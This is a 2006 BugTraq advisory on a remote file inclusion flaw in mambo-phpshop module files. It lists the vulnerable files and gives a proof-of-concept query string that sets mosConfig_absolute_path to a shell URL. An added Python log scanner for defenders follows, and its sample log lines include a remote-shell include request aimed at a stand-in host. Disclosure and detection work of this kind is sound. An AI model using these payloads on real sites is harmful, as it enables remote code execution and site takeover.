BugTraq
mambo-phphop Product Scroller Module R.F.I Aug 18 2006 04:29AM
Outlaw aria-security net (1 replies)
###########################################################################################

# Aria-Security.net Advisory #

# Discovered by: O.U.T.L.A.W #

# < www.Aria-security.net > #

# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #

# #

###########################################################################################

#Software: mambo-phpshop Product Scroller Module

#Attack method: Remote File Inclusion

#Source:

/* Load the phpshop main parse code */

require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );

************************************************************************************

#Vulnerable Files:

mod_phpshop.php

mod_phpshop_allinone.php

mod_phpshop_cart.php

mod_phpshop_featureprod.php

mod_phpshop_latestprod.php

mod_product_categories.php

mod_productscroller.php

mosproductsnap.php

#Proof of Concept:

#one of the files above.php?mosConfig_absolute_path=SHELL

#

#----------------------------------------------------------

#

#

#Contact : Outlaw (at) aria-security (dot) net
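
Added example, not part of the original advisory: a Python check for defenders that scans web-server access logs for requests setting mosConfig_absolute_path on any of the files listed in the advisory. The Apache common/combined log format, the /modules/ path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# File names taken from the advisory's list of affected files.
AFFECTED = {
    "mod_phpshop.php", "mod_phpshop_allinone.php", "mod_phpshop_cart.php",
    "mod_phpshop_featureprod.php", "mod_phpshop_latestprod.php",
    "mod_product_categories.php", "mod_productscroller.php",
    "mosproductsnap.php",
}
PARAM = "mosconfig_absolute_path"  # compared case-insensitively

# Assumption: Apache common/combined log format.
REQUEST_RE = re.compile(
    r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Aug/2006:04:40:01 +0000] "GET /modules/'
    'mod_productscroller.php?mosConfig_absolute_path='
    'http://host.example.invalid/SHELL HTTP/1.0" 200 512',
    '198.51.100.9 - - [18/Aug/2006:04:41:10 +0000] '
    '"GET /index.php?option=com_phpshop HTTP/1.1" 200 9000',
    '203.0.113.7 - - [18/Aug/2006:04:42:33 +0000] "GET /modules/'
    'mosproductsnap.php?x=1&MOSCONFIG_ABSOLUTE_PATH=%2Ftmp%2F HTTP/1.1" 404 210',
]

def find_hits(lines):
    """Return (client, script, value, status) for each request that sets
    the include-path parameter on one of the affected files."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, status = m.groups()
        parts = urlsplit(target)
        script = parts.path.rsplit("/", 1)[-1].lower()
        if script not in AFFECTED:
            continue
        # parse_qsl percent-decodes, so encoded values are caught too.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() == PARAM:
                hits.append((client, script, value, int(status)))
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

Only the query string is inspected; a value sent in a POST body does not appear in an access log and needs request-body logging to detect.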

Re: mambo-phphop Product Scroller Module R.F.I Aug 18 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)


 

Copyright 2010, SecurityFocus